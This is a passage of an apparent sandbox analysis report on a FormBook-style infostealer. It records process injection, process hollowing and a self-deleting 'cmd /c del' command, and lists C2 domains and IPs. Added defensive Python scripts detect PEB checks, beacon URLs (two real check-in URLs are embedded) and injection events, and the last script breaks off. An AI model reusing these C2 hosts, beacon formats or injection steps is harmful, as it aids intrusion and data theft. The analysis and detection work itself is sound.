          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]7_2_035C3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]7_2_035C3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]7_2_035C3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C3D34 mov eax, dword ptr fs:[00000030h]7_2_035C3D34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BAD30 mov eax, dword ptr fs:[00000030h]7_2_035BAD30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D4120 mov eax, dword ptr fs:[00000030h]7_2_035D4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D4120 mov eax, dword ptr fs:[00000030h]7_2_035D4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D4120 mov eax, dword ptr fs:[00000030h]7_2_035D4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D4120 mov eax, dword ptr fs:[00000030h]7_2_035D4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D4120 mov ecx, dword ptr fs:[00000030h]7_2_035D4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036441E8 mov eax, dword ptr fs:[00000030h]7_2_036441E8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03668DF1 mov eax, dword ptr fs:[00000030h]7_2_03668DF1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636DC9 mov eax, dword ptr fs:[00000030h]7_2_03636DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636DC9 mov eax, dword ptr fs:[00000030h]7_2_03636DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636DC9 mov eax, dword ptr fs:[00000030h]7_2_03636DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636DC9 mov ecx, dword ptr fs:[00000030h]7_2_03636DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636DC9 mov eax, dword ptr fs:[00000030h]7_2_03636DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636DC9 mov eax, dword ptr fs:[00000030h]7_2_03636DC9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BB1E1 mov eax, dword ptr fs:[00000030h]7_2_035BB1E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BB1E1 mov eax, dword ptr fs:[00000030h]7_2_035BB1E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035BB1E1 mov eax, dword ptr fs:[00000030h]7_2_035BB1E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CD5E0 mov eax, dword ptr fs:[00000030h]7_2_035CD5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CD5E0 mov eax, dword ptr fs:[00000030h]7_2_035CD5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036805AC mov eax, dword ptr fs:[00000030h]7_2_036805AC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036805AC mov eax, dword ptr fs:[00000030h]7_2_036805AC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EFD9B mov eax, dword ptr fs:[00000030h]7_2_035EFD9B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EFD9B mov eax, dword ptr fs:[00000030h]7_2_035EFD9B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036369A6 mov eax, dword ptr fs:[00000030h]7_2_036369A6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2990 mov eax, dword ptr fs:[00000030h]7_2_035E2990
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B2D8A mov eax, dword ptr fs:[00000030h]7_2_035B2D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B2D8A mov eax, dword ptr fs:[00000030h]7_2_035B2D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B2D8A mov eax, dword ptr fs:[00000030h]7_2_035B2D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B2D8A mov eax, dword ptr fs:[00000030h]7_2_035B2D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B2D8A mov eax, dword ptr fs:[00000030h]7_2_035B2D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EA185 mov eax, dword ptr fs:[00000030h]7_2_035EA185
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036351BE mov eax, dword ptr fs:[00000030h]7_2_036351BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036351BE mov eax, dword ptr fs:[00000030h]7_2_036351BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036351BE mov eax, dword ptr fs:[00000030h]7_2_036351BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036351BE mov eax, dword ptr fs:[00000030h]7_2_036351BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035DC182 mov eax, dword ptr fs:[00000030h]7_2_035DC182
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2581 mov eax, dword ptr fs:[00000030h]7_2_035E2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2581 mov eax, dword ptr fs:[00000030h]7_2_035E2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2581 mov eax, dword ptr fs:[00000030h]7_2_035E2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E2581 mov eax, dword ptr fs:[00000030h]7_2_035E2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E1DB5 mov eax, dword ptr fs:[00000030h]7_2_035E1DB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E1DB5 mov eax, dword ptr fs:[00000030h]7_2_035E1DB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E1DB5 mov eax, dword ptr fs:[00000030h]7_2_035E1DB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E61A0 mov eax, dword ptr fs:[00000030h]7_2_035E61A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E61A0 mov eax, dword ptr fs:[00000030h]7_2_035E61A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E35A1 mov eax, dword ptr fs:[00000030h]7_2_035E35A1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D0050 mov eax, dword ptr fs:[00000030h]7_2_035D0050
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D0050 mov eax, dword ptr fs:[00000030h]7_2_035D0050
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03672073 mov eax, dword ptr fs:[00000030h]7_2_03672073
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EA44B mov eax, dword ptr fs:[00000030h]7_2_035EA44B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03681074 mov eax, dword ptr fs:[00000030h]7_2_03681074
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035D746D mov eax, dword ptr fs:[00000030h]7_2_035D746D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364C450 mov eax, dword ptr fs:[00000030h]7_2_0364C450
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364C450 mov eax, dword ptr fs:[00000030h]7_2_0364C450
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03671C06 mov eax, dword ptr fs:[00000030h]7_2_03671C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0368740D mov eax, dword ptr fs:[00000030h]7_2_0368740D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0368740D mov eax, dword ptr fs:[00000030h]7_2_0368740D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0368740D mov eax, dword ptr fs:[00000030h]7_2_0368740D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636C0A mov eax, dword ptr fs:[00000030h]7_2_03636C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636C0A mov eax, dword ptr fs:[00000030h]7_2_03636C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636C0A mov eax, dword ptr fs:[00000030h]7_2_03636C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636C0A mov eax, dword ptr fs:[00000030h]7_2_03636C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EBC2C mov eax, dword ptr fs:[00000030h]7_2_035EBC2C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E002D mov eax, dword ptr fs:[00000030h]7_2_035E002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E002D mov eax, dword ptr fs:[00000030h]7_2_035E002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E002D mov eax, dword ptr fs:[00000030h]7_2_035E002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E002D mov eax, dword ptr fs:[00000030h]7_2_035E002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E002D mov eax, dword ptr fs:[00000030h]7_2_035E002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03637016 mov eax, dword ptr fs:[00000030h]7_2_03637016
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03637016 mov eax, dword ptr fs:[00000030h]7_2_03637016
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03637016 mov eax, dword ptr fs:[00000030h]7_2_03637016
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CB02A mov eax, dword ptr fs:[00000030h]7_2_035CB02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CB02A mov eax, dword ptr fs:[00000030h]7_2_035CB02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CB02A mov eax, dword ptr fs:[00000030h]7_2_035CB02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035CB02A mov eax, dword ptr fs:[00000030h]7_2_035CB02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03684015 mov eax, dword ptr fs:[00000030h]7_2_03684015
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03684015 mov eax, dword ptr fs:[00000030h]7_2_03684015
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636CF0 mov eax, dword ptr fs:[00000030h]7_2_03636CF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636CF0 mov eax, dword ptr fs:[00000030h]7_2_03636CF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03636CF0 mov eax, dword ptr fs:[00000030h]7_2_03636CF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_036714FB mov eax, dword ptr fs:[00000030h]7_2_036714FB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364B8D0 mov eax, dword ptr fs:[00000030h]7_2_0364B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364B8D0 mov ecx, dword ptr fs:[00000030h]7_2_0364B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364B8D0 mov eax, dword ptr fs:[00000030h]7_2_0364B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364B8D0 mov eax, dword ptr fs:[00000030h]7_2_0364B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364B8D0 mov eax, dword ptr fs:[00000030h]7_2_0364B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_0364B8D0 mov eax, dword ptr fs:[00000030h]7_2_0364B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B58EC mov eax, dword ptr fs:[00000030h]7_2_035B58EC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03688CD6 mov eax, dword ptr fs:[00000030h]7_2_03688CD6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035C849B mov eax, dword ptr fs:[00000030h]7_2_035C849B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035B9080 mov eax, dword ptr fs:[00000030h]7_2_035B9080
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EF0BF mov ecx, dword ptr fs:[00000030h]7_2_035EF0BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EF0BF mov eax, dword ptr fs:[00000030h]7_2_035EF0BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035EF0BF mov eax, dword ptr fs:[00000030h]7_2_035EF0BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03633884 mov eax, dword ptr fs:[00000030h]7_2_03633884
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_03633884 mov eax, dword ptr fs:[00000030h]7_2_03633884
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035F90AF mov eax, dword ptr fs:[00000030h]7_2_035F90AF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A0 mov eax, dword ptr fs:[00000030h]7_2_035E20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A0 mov eax, dword ptr fs:[00000030h]7_2_035E20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A0 mov eax, dword ptr fs:[00000030h]7_2_035E20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A0 mov eax, dword ptr fs:[00000030h]7_2_035E20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A0 mov eax, dword ptr fs:[00000030h]7_2_035E20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_035E20A0 mov eax, dword ptr fs:[00000030h]7_2_035E20A0
          Source: C:\Users\user\Desktop\v8kZUFgdD4.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: DebugJump to behavior
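The fs:[00000030h] reads above are the 32-bit way of fetching the PEB pointer (the TEB sits at fs:0 and holds the PEB address at offset 0x30). The read on its own is neutral; what the code does with the pointer next decides whether it is an anti-debug check (PEB.BeingDebugged at +2, PEB.NtGlobalFlag at +0x68) or ordinary API resolution through the loader list (PEB.Ldr at +0xC). The two "Process token adjusted: Debug" lines are the sample enabling SeDebugPrivilege on its own token. As an added example, not part of the report, the Python below scans a raw x86 code blob for the common encodings of that read and classifies the first PEB field touched afterwards. The byte blob is constructed for illustration, and the follow-up table covers only the encodings listed in it (a register that is copied elsewhere before use is reported as "unknown").

```python
from typing import Dict, List, Tuple

# Encodings of "mov <reg>, dword ptr fs:[30h]" on 32-bit x86 (fs:[30h] = TEB.ProcessEnvironmentBlock).
PEB_READS: Dict[bytes, str] = {
    b"\x64\xa1\x30\x00\x00\x00": "eax",      # mov eax, fs:[30h]  (moffs32 form, the one listed above)
    b"\x64\x8b\x05\x30\x00\x00\x00": "eax",  # mov eax, fs:[30h]  (ModRM form)
    b"\x64\x8b\x0d\x30\x00\x00\x00": "ecx",  # mov ecx, fs:[30h]
    b"\x64\x8b\x15\x30\x00\x00\x00": "edx",  # mov edx, fs:[30h]
}

# ModRM byte for [reg + disp8] with the reg field set to eax (mov/movzx) and to /7 (cmp r/m8, imm8).
_RM = {"eax": (0x40, 0x78), "ecx": (0x41, 0x79), "edx": (0x42, 0x7A)}


def follow_ups(reg: str) -> List[Tuple[bytes, str]]:
    """Instructions that consume the PEB pointer held in `reg`, with the PEB field they touch."""
    rm, rm_cmp = _RM[reg]
    return [
        (bytes([0x0F, 0xB6, rm, 0x02]), "BeingDebugged"),      # movzx eax, byte ptr [reg+2]
        (bytes([0x80, rm_cmp, 0x02, 0x00]), "BeingDebugged"),  # cmp byte ptr [reg+2], 0
        (bytes([0x8B, rm, 0x68]), "NtGlobalFlag"),             # mov eax, [reg+68h]
        (bytes([0x8B, rm, 0x0C]), "Ldr"),                      # mov eax, [reg+0Ch]  (API resolution)
    ]


def scan_peb_reads(code: bytes, window: int = 16) -> List[Tuple[int, str, str]]:
    """Return (offset, register, field) for every PEB read; field is 'unknown' if no known use follows."""
    hits: List[Tuple[int, str, str]] = []
    for pattern, reg in PEB_READS.items():
        start = 0
        while (off := code.find(pattern, start)) >= 0:
            after = code[off + len(pattern): off + len(pattern) + window]
            field = next((name for seq, name in follow_ups(reg) if seq in after), "unknown")
            hits.append((off, reg, field))
            start = off + 1
    return sorted(hits)


# Constructed x86 function: one anti-debug check of each kind, then a loader-list walk.
SAMPLE_CODE = (
    b"\x55\x8b\xec"                       # push ebp; mov ebp, esp
    b"\x64\xa1\x30\x00\x00\x00"           # mov eax, fs:[30h]                 (offset 3)
    b"\x0f\xb6\x40\x02"                   # movzx eax, byte ptr [eax+2]       -> BeingDebugged
    b"\x85\xc0\x75\x10"                   # test eax, eax; jnz +16
    b"\x64\x8b\x0d\x30\x00\x00\x00"       # mov ecx, fs:[30h]                 (offset 17)
    b"\x8b\x41\x68"                       # mov eax, [ecx+68h]                -> NtGlobalFlag
    b"\xa9\x70\x00\x00\x00"               # test eax, 70h
    b"\x64\x8b\x15\x30\x00\x00\x00"       # mov edx, fs:[30h]                 (offset 32)
    b"\x8b\x42\x0c"                       # mov eax, [edx+0Ch]                -> PEB.Ldr
    b"\x5d\xc3"                           # pop ebp; ret
)

if __name__ == "__main__":
    for off, reg, field in scan_peb_reads(SAMPLE_CODE):
        print(f"{off:#06x}: PEB read into {reg}, used for {field}")
```

To run this over the sample itself, feed it the bytes of a code section (for example the .text section taken from one of the unpacked dumps listed under the Yara matches, read with pefile, which is an assumption about your tooling). The window is a heuristic: it will miss a pointer that is pushed or moved before use, and an NtGlobalFlag read is only an anti-debug check when the code then tests the 0x70 heap flags, which the scanner does not verify.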

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 52.58.78.16 80
Source: C:\Windows\explorer.exe | Network Connect: 62.149.128.40 80
Source: C:\Windows\explorer.exe | Domain query: www.oikoschain.com
Source: C:\Windows\explorer.exe | Domain query: www.aizaibali.com
Source: C:\Windows\explorer.exe | Domain query: www.xn--vuq722jwngjre.com
Source: C:\Windows\explorer.exe | Domain query: www.extinctionbrews.com
Source: C:\Windows\explorer.exe | Network Connect: 119.59.120.26 80
Source: C:\Windows\explorer.exe | Domain query: www.doityourselfism.com
Source: C:\Windows\explorer.exe | Domain query: www.findfoodshop.com
Source: C:\Windows\explorer.exe | Domain query: www.invisiongc.net
Source: C:\Windows\explorer.exe | Network Connect: 162.241.62.54 80
Source: C:\Windows\explorer.exe | Network Connect: 169.62.77.158 80
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Network Connect: 103.138.88.11 80
Source: C:\Windows\explorer.exe | Domain query: www.jorgeporcayo.com
Source: C:\Windows\explorer.exe | Network Connect: 154.88.31.204 80
Source: C:\Windows\explorer.exe | Domain query: www.scuolatua.com
Source: C:\Windows\explorer.exe | Domain query: www.okinawarongnho.com
Source: C:\Windows\explorer.exe | Domain query: www.ecofingers.com
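The explorer.exe domain queries and port-80 connections above are the FormBook check-ins. The full URLs appear in the URL table near the end of the report, and every one of them has the same shape: one short path segment (/dy8g/), a query key (i0GDM) carrying a long base64-like blob, and a short fixed trailer (0X=C6Ah3vPx). Path and keys are constant across all the hosts listed, so they identify this campaign, while the shape itself is what survives a change of domains. As an added example, not part of the report, the Python below matches that shape in a whitespace-separated proxy log, extracts the campaign key and notes whether the request carried a User-Agent. The log lines are constructed (two of the report's own URLs plus one benign request), and the assumption that the shape generalises while path and keys stay fixed per campaign is an analyst heuristic, not something the report states.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Beacon shape: http://<host>/<3-8 alnum>/?<key>=<base64-like blob, 40+ chars>&<short key>=<short value>
BEACON_PATH = re.compile(r"^/[A-Za-z0-9]{3,8}/$")
B64ISH = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


def classify_beacon(url: str) -> Optional[Dict[str, str]]:
    """Return campaign fields if the URL has the beacon shape, else None."""
    parts = urlsplit(url)
    if parts.scheme != "http" or not BEACON_PATH.match(parts.path):
        return None
    # Split the query by hand: parse_qsl would turn '+' into ' ' and break the base64 check.
    params = [p.split("=", 1) for p in parts.query.split("&") if "=" in p]
    if len(params) != 2:
        return None
    (data_key, blob), (trail_key, trail_val) = params
    if not B64ISH.match(blob) or len(trail_key) > 3 or len(trail_val) > 12:
        return None
    return {
        "host": parts.hostname or "",
        # path + data key + trailer stay fixed across hosts of one campaign, so they make a pivot key
        "campaign": f"{parts.path.strip('/')}|{data_key}|{trail_key}={trail_val}",
        "payload_len": str(len(blob)),
    }


def scan_proxy_log(lines: List[str]) -> List[Dict[str, str]]:
    """Log format (assumed): '<time> <client> <method> <url> <status> <user-agent or ->', whitespace separated."""
    hits: List[Dict[str, str]] = []
    for line in lines:
        fields = line.split(maxsplit=5)
        if len(fields) < 6:
            continue
        _ts, client, method, url, _status, ua = fields
        beacon = classify_beacon(url)
        if beacon is None:
            continue
        beacon.update({"client": client, "method": method, "no_user_agent": str(ua.strip() == "-")})
        hits.append(beacon)
    return hits


# Constructed proxy log: two check-ins copied from this report's URL table and one ordinary request.
SAMPLE_LOG = [
    "2021-07-22T10:01:02Z 10.0.0.12 GET http://www.okinawarongnho.com/dy8g/?i0GDM=uor47PkOoKkLY099HuArMxw1XFE/ncsTlzCE/ODY21NzZk1xVsb5QvrTgLDn7S7AYBCRuXEk2w==&0X=C6Ah3vPx 200 -",
    "2021-07-22T10:01:05Z 10.0.0.12 GET http://www.example.com/index.html?id=1&lang=en 200 Mozilla/5.0",
    "2021-07-22T10:01:09Z 10.0.0.12 GET http://www.findfoodshop.com/dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPx 200 -",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print(hit)
```

The campaign key is the useful output: group hits by it and the whole domain list collapses to one row, which is how to spot the same campaign reappearing on hosts the report never saw. The shape check on its own is only a heuristic (a legitimate site with a four-character directory and a long token would match), so it should be paired with the missing User-Agent and the target being a process that should not browse, as the explorer.exe evidence above shows.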
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Section loaded: unknown target: C:\Users\user\Desktop\v8kZUFgdD4.exe protection: execute and read and write
Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\ipconfig.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Thread register set: target process: 3440
Source: C:\Windows\SysWOW64\ipconfig.exe | Thread register set: target process: 3440
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 13E0000
Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Process created: C:\Users\user\Desktop\v8kZUFgdD4.exe 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\v8kZUFgdD4.exe'
Source: explorer.exe, 00000005.00000000.379766787.0000000004F80000.00000004.00000001.sdmp, ipconfig.exe, 00000007.00000002.601794902.0000000005BB0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.343823021.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000007.00000002.601794902.0000000005BB0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.343823021.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000007.00000002.601794902.0000000005BB0000.00000002.00000001.sdmp | Binary or memory string: &Program Manager
Source: explorer.exe, 00000005.00000000.343823021.0000000000EE0000.00000002.00000001.sdmp, ipconfig.exe, 00000007.00000002.601794902.0000000005BB0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 0_2_0040205A EntryPoint,GetVersion,GetStartupInfoW,GetModuleHandleA
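Taken together, the evidence in this section is a chain that host telemetry can catch without any unpacking: the sample maps an RWX section into explorer.exe, sets a thread context and queues an APC there; the injected explorer.exe then starts ipconfig.exe and is the process that talks HTTP; and ipconfig.exe removes the original file through cmd.exe /c del. As an added example, not from the report or the sandbox vendor, the Python below runs four rules over Sysmon-style events (ID 1 ProcessCreate, ID 3 NetworkConnect, ID 10 ProcessAccess). The field names follow Sysmon's schema; the event values, pids and the 0x1FFFFF access mask are constructed to mirror this report, and the list of utilities that explorer.exe should not be launching is a tunable assumption seeded with the one seen here.

```python
import ipaddress
from typing import Dict, List, Tuple

Event = Dict[str, object]

# Process rights an injector needs on its target (winnt.h values).
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Console utilities that explorer.exe has no reason to start and that never spawn cmd.exe themselves.
# Only the one from this report is listed; extend per environment (assumption, not a Sysmon default).
NET_UTILITIES = {"ipconfig.exe"}


def basename(path: object) -> str:
    return str(path).lower().rsplit("\\", 1)[-1]


def is_public(ip: str) -> bool:
    try:
        return ipaddress.ip_address(ip).is_global
    except ValueError:
        return False


def detect(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule, detail) for every event that matches one of the four rules."""
    alerts: List[Tuple[str, str]] = []
    for e in events:
        eid = e.get("EventID")
        if eid == 3:
            # Rule 1: the shell itself talking HTTP(S) to the Internet.
            if (basename(e["Image"]) == "explorer.exe"
                    and int(str(e["DestinationPort"])) in (80, 443)
                    and is_public(str(e["DestinationIp"]))):
                alerts.append(("system_process_network",
                               f"explorer.exe -> {e['DestinationIp']}:{e['DestinationPort']}"))
        elif eid == 1:
            img, parent = basename(e["Image"]), basename(e["ParentImage"])
            cmd = str(e.get("CommandLine", "")).lower()
            # Rule 2: explorer.exe starting a network utility (the injected shell picking its next host).
            if parent == "explorer.exe" and img in NET_UTILITIES:
                alerts.append(("shell_spawns_net_utility", f"explorer.exe -> {img}"))
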